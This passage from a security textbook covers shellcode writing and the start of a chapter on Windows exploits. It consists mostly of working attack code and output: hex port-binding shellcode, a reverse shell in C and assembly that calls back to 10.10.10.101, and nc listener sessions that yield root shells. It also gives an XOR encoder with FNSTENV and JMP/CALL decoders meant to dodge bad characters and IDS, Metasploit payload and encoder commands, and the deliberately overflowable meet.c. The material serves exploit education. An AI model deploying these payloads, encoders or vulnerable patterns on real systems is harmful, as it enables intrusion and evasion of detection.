"\x66\xcd\x80\x52\x52\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc3"
"\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
"\xe1\xb0\x0b\xcd\x80";
main(){
void (*fp) (void); // declare a function pointer, fp
fp = (void *)sc; // set the address of the fp to our shellcode
fp(); // execute the function (our shellcode)
}
Compile the program and start it:
# gcc -o port_bind_sc port_bind_sc.c
# ./port_bind_sc
In another shell, verify the socket is listening. Recall, we used the port 0xBBBB in our
shellcode, so we should see port 48059 open.
# netstat -pan |grep port_bind_sc
tcp 0 0 0.0.0.0:48059 0.0.0.0:* LISTEN
21326/port_bind_sc
CAUTION When testing this program and the others in this chapter, if you
run them repeatedly, you may get a state of TIME WAIT or FIN WAIT. You
will need to wait for internal kernel TCP timers to expire, or simply change
the port to another one if you are impatient.
Finally, switch to a normal user and connect:
# su joeuser
$ nc localhost 48059
id
uid=0(root) gid=0(root) groups=0(root)
exit
$
Success!
References
Smiler, “Writing Shellcode” http://community.corest.com/~juliano/art-shellcode.txt
Zillion, “Writing Shellcode” www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html
Sean Walton, Linux Socket Programming (Indianapolis: SAMS Publishing, 2001)
Implementing Reverse Connecting Shellcode
The last section was nice, but what if the vulnerable system sits behind a firewall and the
attacker cannot connect to the exploited system on a new port? As discussed in the previous
chapter, attackers will then use another technique: have the exploited system connect
back to the attacker on a particular IP and port. This is referred to as a reverse
connecting shell.
Reverse Connecting C Program
The good news is that we only need to change a few things from our previous port binding
code:
1. Replace bind, listen, and accept functions with a connect.
2. Add the destination address to the sockaddr structure.
3. Duplicate the stdin, stdout, and stderr to the open socket, not the client as
before.
Therefore, the reverse connecting code looks like:
$ cat reverse_connect.c
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
int main()
{
char * shell[2];
int soc,remote; //same declarations as last time
struct sockaddr_in serv_addr;
serv_addr.sin_family=2; // same setup of the sockaddr_in
serv_addr.sin_addr.s_addr=0x650A0A0A; //10.10.10.101
serv_addr.sin_port=0xBBBB; // port 48059
soc=socket(2,1,0);
remote = connect(soc, (struct sockaddr*)&serv_addr,0x10);
dup2(soc,0); //notice the change, we dup to the socket
dup2(soc,1); //notice the change, we dup to the socket
dup2(soc,2); //notice the change, we dup to the socket
shell[0]="/bin/sh"; //normal set up for execve
shell[1]=0;
execve(shell[0],shell,0); //boom!
}
CAUTION The previous code has hard-coded values in it. You may need to
change the IP given before compiling in order for this example to work on your
system. If you use an IP that has a 0 in an octet (for example, 127.0.0.1), the
resulting shellcode will contain a NULL byte and not work in an exploit. To create
the IP, simply convert each octet to hex and place them in reverse order (byte by byte).
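The octet reversal described in the CAUTION can be sketched in a few lines of C. This is only an illustration under our own naming (ip_to_reversed_hex and has_null_octet are hypothetical helpers, not part of the original program): it parses a dotted address, builds the 32-bit literal with the last octet as the most significant byte, and reports whether any octet is zero.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper: turn "a.b.c.d" into the 32-bit literal with the
 * octets in reverse order (d becomes the most significant byte).
 * Returns 0 on success, -1 if the string is not a valid dotted quad. */
int ip_to_reversed_hex(const char *dotted, uint32_t *out)
{
    unsigned int a, b, c, d;
    char extra;
    /* exactly four numbers and nothing after them */
    if (sscanf(dotted, "%u.%u.%u.%u%c", &a, &b, &c, &d, &extra) != 4)
        return -1;
    if (a > 255 || b > 255 || c > 255 || d > 255)
        return -1;
    *out = ((uint32_t)d << 24) | ((uint32_t)c << 16) | ((uint32_t)b << 8) | a;
    return 0;
}

/* Returns 1 if any of the four bytes of v is 0x00. */
int has_null_octet(uint32_t v)
{
    int i;
    for (i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xff) == 0)
            return 1;
    return 0;
}
```

With this sketch, 10.10.10.101 becomes 0x650A0A0A, matching the value used in the listing, while 127.0.0.1 becomes 0x0100007F and is flagged because of its two zero octets.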
Now that we have new C code, let’s test it by firing up a listener shell on our system at
IP 10.10.10.101:
$ nc -nlvv -p 48059
listening on [any] 48059 ...
The -nlvv flags prevent DNS resolution, set up a listener, and set netcat to very verbose
mode.
Now compile the new program and execute it:
# gcc -o reverse_connect reverse_connect.c
# ./reverse_connect
On the listener shell, you should see a connection. Go ahead and issue a test command:
connect to [10.10.10.101] from (UNKNOWN) [10.10.10.101] 38877
id;
uid=0(root) gid=0(root) groups=0(root)
It worked!
Reverse Connecting Assembly Program
Again, we will simply modify our previous port_bind_asm.asm example to produce the
desired effect:
$ cat ./reverse_connect_asm.asm
BITS 32
section .text
global _start
_start:
xor eax,eax ;clear eax
xor ebx,ebx ;clear ebx
xor edx,edx ;clear edx
;socket(2,1,0)
push eax ; third arg to socket: 0
push byte 0x1 ; second arg to socket: 1
push byte 0x2 ; first arg to socket: 2
mov ecx,esp ; move the ptr to the args to ecx (2nd arg to socketcall)
inc bl ; set first arg to socketcall to # 1
mov al,102 ; call socketcall # 1: SYS_SOCKET
int 0x80 ; jump into kernel mode, execute the syscall
mov esi,eax ; store the return value (eax) into esi
;the next block replaces the bind, listen, and accept calls with connect
;client=connect(server,(struct sockaddr *)&serv_addr,0x10)
push edx ; still zero, used to terminate the next value pushed
push long 0x650A0A0A ; extra this time, push the address in reverse hex
push word 0xBBBB ; push the port onto the stack, 48059 in decimal
xor ecx, ecx ; clear ecx to hold the sa_family field of struct
mov cl,2 ; move single byte:2 to the low order byte of ecx
push word cx ; build struct, use port,sin.family:0002 four bytes
mov ecx,esp ; move addr struct (on stack) to ecx
push byte 0x10 ; begin the connect args, push 16 (size) on stack
push ecx ; save address of struct back on stack
push esi ; save server file descriptor (esi) to stack
mov ecx,esp ; store ptr to args to ecx (2nd arg of socketcall)
mov bl,3 ; set bl to # 3, first arg of socketcall
mov al,102 ; call socketcall # 3: SYS_CONNECT
int 0x80 ; jump into kernel mode, execute the syscall
; prepare for dup2 commands, need client file handle saved in ebx
mov ebx,esi ; copied soc file descriptor of client to ebx
;dup2(soc, 0)
xor ecx,ecx ; clear ecx
mov al,63 ; set eax to syscall number 63 (0x3f): dup2
int 0x80 ; jump into kernel mode, execute the syscall
;dup2(soc, 1)
inc ecx ; increment ecx to 1
mov al,63 ; prepare for syscall to dup2:63
int 0x80 ; jump into kernel mode, execute the syscall
;dup2(soc, 2)
inc ecx ; increment ecx to 2
mov al,63 ; prepare for syscall to dup2:63
int 0x80 ; jump into kernel mode, execute the syscall
;standard execve("/bin/sh"...
push edx
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al, 0x0b
int 0x80
As with the C program, this assembly program simply replaces the bind, listen, and
accept system calls with a connect system call instead. There are a few other things to
note. First, we have pushed the connecting address to the stack prior to the port. Next,
notice how the port has been pushed onto the stack, and then how a clever trick is used
to push the value 0x0002 onto the stack without using assembly instructions that will
yield NULL characters in the final hex opcodes. Finally, notice how the dup2 system
calls work on the socket itself, not the client handle as before.
Okay, let’s try it:
$ nc -nlvv -p 48059
listening on [any] 48059 ...
In another shell, assemble, link, and launch the binary:
$ nasm -f elf reverse_connect_asm.asm
$ ld -o reverse_connect_asm reverse_connect_asm.o
$ ./reverse_connect_asm
Again, if everything worked well, you should see a connect in your listener shell.
Issue a test command:
connect to [10.10.10.101] from (UNKNOWN) [10.10.10.101] 38877
id;
uid=0(root) gid=0(root) groups=0(root)
It will be left as an exercise for the reader to extract the hex opcodes and test the resulting
shellcode.
References
Smashing the Stack…, Aleph One www.phrack.org/archives/49/P49-14
Smiler, Writing Shellcode http://community.corest.com/~juliano/art-shellcode.txt
Zillion www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html
Sean Walton, Linux Socket Programming (Indianapolis: SAMS Publishing, 2001)
Linux Reverse Shell www.packetstormsecurity.org/shellcode/connect-back.c
Encoding Shellcode
Some of the many reasons to encode shellcode include
• Avoiding bad characters (\x00, \xa9, etc.)
• Avoiding detection of IDS or other network-based sensors
• Conforming to string filters, for example, tolower
In this section, we will cover shellcode encoding and work through examples.
Simple XOR Encoding
A simple parlor trick of computer science is the “exclusive or” (XOR) function. The XOR
function works like this:
0 XOR 0 = 0
0 XOR 1 = 1
1 XOR 0 = 1
1 XOR 1 = 0
The result of the XOR function (as its name implies) is true (Boolean 1) if and only if
exactly one of the inputs is true. If both of the inputs are true, then the result is false. The XOR
function is interesting because it is reversible, meaning if you XOR a number (bitwise)
with another number twice, you get the original number back as a result. For example:
In binary, we can encode 5(101) with the key 4(100): 101 XOR 100 = 001
And to decode the number, we repeat with the same key(100): 001 XOR 100 = 101
In this case, we start with the number 5 in binary (101) and we XOR it with a key of 4
in binary (100). The result is the number 1 in binary (001). To get our original number
back, we can repeat the XOR operation with the same key (100).
The reversible characteristics of the XOR function make it a great candidate for encoding
and basic encryption. You simply encode a string at the bit level by performing the
XOR function with a key. Later you can decode it by performing the XOR function with
the same key.
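To make the round trip concrete, here is a minimal sketch of byte-wise XOR over a buffer. The function name xor_buf is our own choice for illustration. Applying it twice with the same key returns the buffer to its original contents.

```c
#include <stddef.h>

/* XOR every byte of buf with key, in place. Calling this a second time
 * with the same key restores the original bytes. */
void xor_buf(unsigned char *buf, size_t len, unsigned char key)
{
    size_t i;
    for (i = 0; i < len; i++)
        buf[i] ^= key;
}
```

Running it on a buffer holding the value 5 with the key 4 gives 1, and running it again with the key 4 gives 5 back, just as in the binary example above.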
Structure of Encoded Shellcode
When shellcode is encoded, a decoder needs to be placed on the front of the shellcode.
This decoder will execute first and decode the shellcode before passing execution to the
decoded shellcode. The structure of encoded shellcode looks like:
[decoder] [encoded shellcode]
NOTE It is important to realize that the decoder needs to adhere to the
same limitations you are trying to avoid by encoding the shellcode in the first
place. For example, if you are trying to avoid a bad character, say 0x00, then
the decoder cannot have that byte either.
JMP/CALL XOR Decoder Example
The decoder needs to know its own location so it can calculate the location of the
encoded shellcode and start decoding. There are many ways to determine the location of
the decoder, often referred to as GETPC. One of the most common GETPC techniques is
the JMP/CALL technique. We start with a JMP instruction forward to a CALL instruction,
which is located just before the start of the encoded shellcode. The CALL instruction will
push the address of the bytes that follow it (the beginning of the encoded shellcode) onto the
stack and jump back to the instruction right after the original JMP. At that point,
we can pop the location of the encoded shellcode off the stack and store it in a register
for use when decoding. For example:
BT book # cat jmpcall.asm
[BITS 32]
global _start
_start:
jmp short call_point ; 1. JMP to CALL
begin:
pop esi ; 3. pop shellcode loc into esi for use in decoding
xor ecx,ecx ; 4. clear ecx
mov cl,0x0 ; 5. place holder (0x0) for size of shellcode
short_xor:
xor byte[esi],0x0 ; 6. XOR byte from esi with key (0x0=placeholder)
inc esi ; 7. increment esi pointer to next byte
loop short_xor ; 8. repeat to 6 until shellcode is decoded
jmp short shellcode ; 9. jump over call into decoded shellcode
call_point:
call begin ; 2. CALL back to begin, push shellcode loc on stack
shellcode: ; 10. decoded shellcode executes
; the decoded shellcode goes here.
You can see the JMP/CALL sequence in the preceding code. The location of the encoded
shellcode is popped off the stack and stored in esi. ecx is cleared and the size of
the shellcode is stored there. For now we use the placeholder of 0x00 for the size of our
shellcode. Later we will overwrite that value with our encoder. Next the shellcode is
decoded byte by byte. Notice the loop instruction will decrement ecx automatically on
each call to LOOP and ends automatically when ecx = 0x0. After the shellcode is
decoded, the program JMPs into the decoded shellcode.
Let’s assemble, link, and dump the binary OPCODE of the program.
BT book # nasm -f elf jmpcall.asm
BT book # ld -o jmpcall jmpcall.o
BT book # objdump -d ./jmpcall
./jmpcall: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: eb 0d jmp 804808f <call_point>
08048082 <begin>:
8048082: 5e pop %esi
8048083: 31 c9 xor %ecx,%ecx
8048085: b1 00 mov $0x0,%cl
08048087 <short_xor>:
8048087: 80 36 00 xorb $0x0,(%esi)
804808a: 46 inc %esi
804808b: e2 fa loop 8048087 <short_xor>
804808d: eb 05 jmp 8048094
0804808f <call_point>:
804808f: e8 ee ff ff ff call 8048082 <begin>
BT book #
The binary representation (in hex) of our JMP/CALL decoder is
decoder[] =
"\xeb\x0d\x5e\x31\xc9\xb1\x00\x80\x36\x00\x46\xe2\xfa\xeb\x05"
"\xe8\xee\xff\xff\xff"
We will have to replace the NULL bytes just shown with the length of our shellcode and
the key to decode with, respectively.
FNSTENV XOR Example
Another popular GETPC technique is to use the FNSTENV assembly instruction as
described by Noir. The FNSTENV instruction writes a 28-byte Floating Point Unit (FPU)
environment record to the memory address specified by the operand.
The FPU environment record is a structure defined as user_fpregs_struct in /usr/
include/sys/user.h and contains the members (at offsets):
• 0 Control word
• 4 Status word
• 8 Tag word
• 12 Last FPU Instruction Pointer
• Other fields
As you can see, offset 12 of the FPU environment record contains the Extended
Instruction Pointer (EIP) of the last FPU instruction called. So, in the following example,
we will first call an innocuous FPU instruction (FABS), and then call the FNSTENV
command to extract the EIP of the FABS command.
Since the eip is located 12 bytes inside the returned FPU record, we will write the
record 12 bytes before the top of the stack (ESP-0xC), which will place the eip value at
the top of our stack. Then we will pop the value off the stack into a register for use during
decoding.
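The offset arithmetic can be checked with a small C model of the record. This is a sketch under our own assumptions: the struct and field names below are illustrative and are not copied from any system header, and the layout assumed is the 28-byte image used in 32-bit protected mode.

```c
#include <stddef.h>
#include <stdint.h>

/* Illustrative model of the 32-bit protected-mode FPU environment image.
 * Field names are hypothetical. */
struct fpu_env32 {
    uint32_t control_word;  /* offset 0  (low 16 bits used)              */
    uint32_t status_word;   /* offset 4  (low 16 bits used)              */
    uint32_t tag_word;      /* offset 8  (low 16 bits used)              */
    uint32_t fpu_ip;        /* offset 12: address of last FPU instruction */
    uint32_t fpu_cs_opcode; /* offset 16                                 */
    uint32_t fpu_data_ptr;  /* offset 20                                 */
    uint32_t fpu_ds;        /* offset 24                                 */
};

/* Address to give FNSTENV so that the fpu_ip field lands exactly at esp. */
uint32_t fnstenv_target(uint32_t esp)
{
    return esp - (uint32_t)offsetof(struct fpu_env32, fpu_ip);
}
```

Because the instruction pointer field sits at offset 12, storing the record at ESP-0xC leaves that field at the top of the stack, where a single pop retrieves it.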
BT book # cat ./fnstenv.asm
[BITS 32]
global _start
_start:
fabs ;1. innocuous FPU instruction
fnstenv [esp-0xc] ;2. dump FPU environ. record at ESP-12
pop edx ;3. pop eip of fabs FPU instruction to edx
add dl, 00 ;4. offset from fabs -> xor buffer (placeholder)
short_xor_beg:
xor ecx,ecx ;5. clear ecx to use for loop
mov cl, 0x18 ;6. size of xor'd payload
short_xor_xor:
xor byte [edx], 0x00 ;7. the byte to xor with (key placeholder)
inc edx ;8. increment EDX to next byte
loop short_xor_xor ;9. loop through all of shellcode
shellcode:
; the decoded shellcode goes here.
Once we obtain the location of FABS (line 3 preceding), we have to adjust it (line 4) to point to
the beginning of the encoded shellcode. Now let’s assemble, link, and dump the
opcodes of the decoder.
BT book # nasm -f elf fnstenv.asm
BT book # ld -o fnstenv fnstenv.o
BT book # objdump -d ./fnstenv
./fnstenv: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: d9 e1 fabs
8048082: d9 74 24 f4 fnstenv 0xfffffff4(%esp)
8048086: 5a pop %edx
8048087: 80 c2 00 add $0x0,%dl
0804808a <short_xor_beg>:
804808a: 31 c9 xor %ecx,%ecx
804808c: b1 18 mov $0x18,%cl
0804808e <short_xor_xor>:
804808e: 80 32 00 xorb $0x0,(%edx)
8048091: 42 inc %edx
8048092: e2 fa loop 804808e <short_xor_xor>
BT book #
Our FNSTENV decoder can be represented in binary as follows:
char decoder[] =
"\xd9\xe1\xd9\x74\x24\xf4\x5a\x80\xc2\x00\x31"
"\xc9\xb1\x18\x80\x32\x00\x42\xe2\xfa";
Putting It All Together
We will now put it together and build a FNSTENV encoder and decoder test program.
BT book # cat encoder.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
int getnumber(int quo) { //random number generator function
int seed;
struct timeval tm;
gettimeofday( &tm, NULL );
seed = tm.tv_sec + tm.tv_usec;
srandom( seed );
return (random() % quo);
}
void execute(char *data){ //test function to execute encoded shellcode
printf("Executing...\n");
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)data;
}
void print_code(char *data) { //prints out the shellcode
int i,l = 15;
for (i = 0; i < strlen(data); ++i) {
if (l >= 15) {
if (i)
printf("\"\n");
printf("\t\"");
l = 0;
}
++l;
printf("\\x%02x", ((unsigned char *)data)[i]);
}
printf("\";\n\n");
}
int main() { //main function
char shellcode[] = //original shellcode
"\x31\xc0\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int count;
int number = getnumber(200); //random number generator
int badchar = 0; //used as flag to check for bad chars
int ldecoder; //length of decoder
int lshellcode = strlen(shellcode); //store length of shellcode
char *result;
//simple fnstenv xor decoder, NULL are overwritten with length and key.
char decoder[] = "\xd9\xe1\xd9\x74\x24\xf4\x5a\x80\xc2\x00\x31"
"\xc9\xb1\x18\x80\x32\x00\x42\xe2\xfa";
printf("Using the key: %d to xor encode the shellcode\n",number);
decoder[9] += 0x14; //length of decoder
decoder[16] += number; //key to encode with
ldecoder = strlen(decoder); //calculate length of decoder
printf("\nchar original_shellcode[] =\n");
print_code(shellcode);
do { //encode the shellcode
if(badchar == 1) { //if bad char, regenerate key
number = getnumber(10);
decoder[16] += number;
badchar = 0;
}
for(count=0; count < lshellcode; count++) { //loop through shellcode
shellcode[count] = shellcode[count] ^ number; //xor encode byte
if(shellcode[count] == '\0') { // other bad chars can be listed here
badchar = 1; //set bad char flag, will trigger redo
}
}
} while(badchar == 1); //repeat if badchar was found
result = malloc(lshellcode + ldecoder);
strcpy(result,decoder); //place decoder in front of buffer
strcat(result,shellcode); //place encoded shellcode behind decoder
printf("\nchar encoded[] =\n"); //print label
print_code(result); //print encoded shellcode
execute(result); //execute the encoded shellcode
}
BT book #
Now compile it and launch it three times.
BT book # gcc -o encoder encoder.c
BT book # ./encoder
Using the key: 149 to xor encode the shellcode
char original_shellcode[] =
"\x31\xc0\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
char encoded[] =
"\xd9\xe1\xd9\x74\x24\xf4\x5a\x80\xc2\x14\x31\xc9\xb1\x18\x80"
"\x32\x95\x42\xe2\xfa\xa4\x55\x0c\xc7\xfd\xba\xba\xe6\xfd\xfd"
"\xba\xf7\xfc\xfb\x1c\x76\xc5\xc6\x1c\x74\x25\x9e\x58\x15";
Executing...
sh-3.1# exit
exit
BT book # ./encoder
Using the key: 104 to xor encode the shellcode
char original_shellcode[] =
"\x31\xc0\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
char encoded[] =
"\xd9\xe1\xd9\x74\x24\xf4\x5a\x80\xc2\x14\x31\xc9\xb1\x18\x80"
"\x32\x6f\x42\xe2\xfa\x5e\xaf\xf6\x3d\x07\x40\x40\x1c\x07\x07"
"\x40\x0d\x06\x01\xe6\x8c\x3f\x3c\xe6\x8e\xdf\x64\xa2\xef";
Executing...
sh-3.1# exit
exit
BT book # ./encoder
Using the key: 96 to xor encode the shellcode
char original_shellcode[] =
"\x31\xc0\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
char encoded[] =
"\xd9\xe1\xd9\x74\x24\xf4\x5a\x80\xc2\x14\x31\xc9\xb1\x18\x80"
"\x32\x60\x42\xe2\xfa\x51\xa0\xf9\x32\x08\x4f\x4f\x13\x08\x08"
"\x4f\x02\x09\x0e\xe9\x83\x30\x33\xe9\x81\xd0\x6b\xad\xe0";
Executing...
sh-3.1# exit
exit
BT book #
As you can see, the original shellcode is encoded and appended to the decoder. The
decoder is overwritten at runtime to replace the NULL bytes with length and key respectively.
As expected, each time the program is executed, a new set of encoded shellcode is
generated. However, most of the decoder remains the same.
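The program above picks its key at random and retries when an encoded byte turns out to be a bad character. As an alternative sketch (our own variation, not the method used in encoder.c), the key can be searched for deterministically: try each candidate from 1 to 255 and accept the first one for which neither the key itself nor any encoded byte is on the bad list. The names is_bad and pick_xor_key are hypothetical.

```c
#include <stddef.h>

/* Returns 1 if b appears in the bad[] list. */
static int is_bad(unsigned char b, const unsigned char *bad, size_t nbad)
{
    size_t i;
    for (i = 0; i < nbad; i++)
        if (b == bad[i])
            return 1;
    return 0;
}

/* Hypothetical helper: return the first key in 1..255 such that the key
 * and every byte of data XOR key avoid the bad[] list, or -1 if no
 * single-byte key qualifies. The data buffer is not modified. */
int pick_xor_key(const unsigned char *data, size_t len,
                 const unsigned char *bad, size_t nbad)
{
    int key;
    size_t i;
    for (key = 1; key <= 255; key++) {
        if (is_bad((unsigned char)key, bad, nbad))
            continue; /* the key is embedded in the decoder, so it must be clean too */
        for (i = 0; i < len; i++)
            if (is_bad((unsigned char)(data[i] ^ key), bad, nbad))
                break;
        if (i == len)
            return key; /* every encoded byte passed the check */
    }
    return -1;
}
```

A return value of -1 means a single-byte XOR key cannot satisfy the restrictions for that input, which is one reason more elaborate encoders exist.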
There are ways to add some entropy to the decoder. Portions of the decoder may be
done in multiple ways. For example, instead of using the add instruction, we could have
used the sub instruction. Likewise, we could have used any number of FPU instructions
instead of FABS. So, we can break down the decoder into smaller interchangeable parts
and randomly piece them together to accomplish the same task and obtain some level
of change on each execution.
Automating Shellcode Generation with Metasploit
Now that you have learned “long division,” let’s show you how to use the “calculator.” The
Metasploit package comes with tools to assist in shellcode generation and encoding.
Generating Shellcode with Metasploit
The msfpayload command is supplied with Metasploit and automates the generation of
shellcode.
allen@IBM-4B5E8287D50 ~/framework
$ ./msfpayload
Usage: ./msfpayload
Payloads:
bsd_ia32_bind BSD IA32 Bind Shell
bsd_ia32_bind_stg BSD IA32 Staged Bind Shell
bsd_ia32_exec BSD IA32 Execute Command
… truncated for brevity
linux_ia32_bind Linux IA32 Bind Shell
linux_ia32_bind_stg Linux IA32 Staged Bind Shell
linux_ia32_exec Linux IA32 Execute Command
… truncated for brevity
win32_adduser Windows Execute net user /ADD
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
… truncated for brevity
Notice the possible output formats:
• S Summary to include options of payload
• C C language format
• P Perl format
• R Raw format, nice for passing into msfencode and other tools
• X Export to executable format (Windows only)
We will choose the linux_ia32_bind payload. To check options, simply supply the type.
allen@IBM-4B5E8287D50 ~/framework
$ ./msfpayload linux_ia32_bind
Name: Linux IA32 Bind Shell
Version: $Revision: 1638 $
OS/CPU: linux/x86
Needs Admin: No
Multistage: No
Total Size: 84
Keys: bind
Provided By:
skape
vlad902
Available Options:
Options: Name Default Description
-------- ------ ------- -----------------------------
required LPORT 4444 Listening port for bind shell
Advanced Options:
Advanced (Msf::Payload::linux_ia32_bind):
-----------------------------------------
Description:
Listen for connection and spawn a shell
Just to show how, we will change the local port to 3333 and use the C output format.
allen@IBM-4B5E8287D50 ~/framework
$ ./msfpayload linux_ia32_bind LPORT=3333 C
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x0d\x05\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
Wow, that was easy!
Encoding Shellcode with Metasploit
The msfencode tool is provided by Metasploit and will encode your payload (in raw
format).
$ ./msfencode -h
Usage: ./msfencode
Options:
-i
-a
-o
-t
-b
-s
-e
-n
-l List all available encoders
Now we can pipe our msfpayload output in (Raw format) into the msfencode tool, provide
a list of bad characters, and check for available encoders (-l option).
allen@IBM-4B5E8287D50 ~/framework
$ ./msfpayload linux_ia32_bind LPORT=3333 R | ./msfencode -b '\x00' -l
Encoder Name Arch Description
============================================================================
…truncated for brevity
JmpCallAdditive x86 Jmp/Call XOR Additive Feedback Decoder
…
PexAlphaNum x86 Skylined's alphanumeric encoder ported to perl
PexFnstenvMov x86 Variable-length fnstenv/mov dword xor encoder
PexFnstenvSub x86 Variable-length fnstenv/sub dword xor encoder
…
ShikataGaNai x86 You know what I'm saying, baby
…
We will select the PexFnstenvMov encoder, as we are most familiar with that.
allen@IBM-4B5E8287D50 ~/framework
$ ./msfpayload linux_ia32_bind LPORT=3333 R | ./msfencode -b '\x00' -e PexFnstenvMov -t c
[*] Using Msf::Encoder::PexFnstenvMov with final size of 106 bytes
"\x6a\x15\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbb\xf0\x41"
"\x88\x83\xeb\xfc\xe2\xf4\x8a\x2b\x12\xcb\xe8\x9a\x43\xe2\xdd\xa8"
"\xd8\x01\x5a\x3d\xc1\x1e\xf8\xa2\x27\xe0\xb6\xf5\x27\xdb\x32\x11"
"\x2b\xee\xe3\xa0\x10\xde\x32\x11\x8c\x08\x0b\x96\x90\x6b\x76\x70"
"\x13\xda\xed\xb3\xc8\x69\x0b\x96\x8c\x08\x28\x9a\x43\xd1\x0b\xcf"
"\x8c\x08\xf2\x89\xb8\x38\xb0\xa2\x29\xa7\x94\x83\x29\xe0\x94\x92"
"\x28\xe6\x32\x13\x13\xdb\x32\x11\x8c\x08";
As you can see, that is much easier than building your own. There is also a web interface
to the msfpayload and msfencode tools. We will leave that for other chapters.
References
Noir use of FNSTENV www.securityfocus.com/archive/82/327100/30/0/threaded
JMP/CALL and FNSTENV decoders www.klake.org/~jt/encoder/#decoders
Good brief on shellcode and encoders www.secdev.org/conf/shellcodes_syscan04.pdf
Metasploit www.metasploit.com/confs/recon2005/recent_shellcode_developmentsrecon05.pdf
CHAPTER 11 Basic Windows Exploits
In this chapter, we will show how to build basic Windows exploits.
• Compiling Windows programs
• Linking with debugging information
• Debugging Windows programs with Windows console debuggers
• Using symbols
• Disassembling Windows programs
• Debugging Windows programs with OllyDbg
• Building your first Windows exploit of meet.exe
• Real-world Windows exploit example
Up to this point in the book, we’ve been using Linux as our platform of choice because
it’s easy for most people interested in hacking to get hold of a Linux machine for experimentation.
Many of the interesting bugs you’ll want to exploit, however, are on the
more-often-used Windows platform. Luckily, the same bugs can be exploited largely the
same way on both Linux and Windows, because they are both driven by the same assembly
language underneath the hood. So in this chapter, we’ll talk about where to get the
tools to build Windows exploits, show you how to use those tools, and recycle one of the
Linux examples from Chapter 6 by creating the same exploit on Windows.
Compiling and Debugging Windows Programs
Development tools are not included with Windows, but that doesn’t mean you need to
spend $1,000 for Visual Studio to experiment with exploit writing. (If you have it
already, great—feel free to use it for this chapter.) You can download for free the same
compiler and debugger Microsoft bundles with Visual Studio .NET 2003 Professional.
In this section, we’ll show you how to initially set up your Windows exploit workstation.
Compiling on Windows
The Microsoft C/C++ Optimizing Compiler and Linker are available for free from
http://msdn.microsoft.com/vstudio/express/visualc/default.aspx. After a 32MB download and a
straightforward install, you’ll have a Start menu link to the Visual C++ 2005 Express Edition.
Click the shortcut to launch a command prompt with its environment configured for
compiling code. To test it out, let’s start with the meet.c example we introduced in Chapter 6
and then exploited in Linux in Chapter 7. Type in the example or copy it from the Linux
machine you built it on earlier.
C:\grayhat>type hello.c
//hello.c
#include <stdio.h>
main ( ) {
printf("Hello haxor");
}
The Windows compiler is cl.exe. Passing the compiler the name of the source file will
generate hello.exe. (Remember from Chapter 6 that compiling is simply the process of
turning human-readable source code into machine-readable binary files that can be
digested by the computer and executed.)
C:\grayhat>cl hello.c
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 14.00.50727.42 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
hello.c
Microsoft (R) Incremental Linker Version 8.00.50727.42
Copyright (C) Microsoft Corporation. All rights reserved.
/out:hello.exe
hello.obj
C:\grayhat>hello.exe
Hello haxor
Pretty simple, eh? Let’s move on to build the program we’ll be exploiting later in the
chapter. Create meet.c from Chapter 6 and compile it using cl.exe.
C:\grayhat>type meet.c
//meet.c
#include <stdio.h>
#include <string.h>
greeting(char *temp1, char *temp2) {
char name[400];
strcpy(name, temp2);
printf("Hello %s %s\n", temp1, name);
}
main(int argc, char *argv[]){
greeting(argv[1], argv[2]);
printf("Bye %s %s\n", argv[1], argv[2]);
}
C:\grayhat>cl meet.c
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 14.00.50727.42 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
meet.c
Microsoft (R) Incremental Linker Version 8.00.50727.42
Copyright (C) Microsoft Corporation. All rights reserved.
/out:meet.exe
meet.obj
C:\grayhat>meet.exe Mr. Haxor
Hello Mr. Haxor
Bye Mr. Haxor
Chapter 11: Basic Windows Exploits
PART III
Windows Compiler Options
If you type in cl.exe /?, you’ll get a huge list of compiler options. Most are not interesting
to us at this point. The following table gives the flags you’ll be using in this chapter.
Option    Description
/Zi       Produces extra debugging information, useful when using the Windows
          debugger that we’ll demonstrate later.
/Fe       Similar to gcc’s -o option. The Windows compiler by default names the
          executable the same as the source with .exe appended. If you want to
          name it something different, specify this flag followed by the EXE
          name you’d like.
/GS[-]    The /GS flag is on by default in Microsoft Visual Studio 2005 and
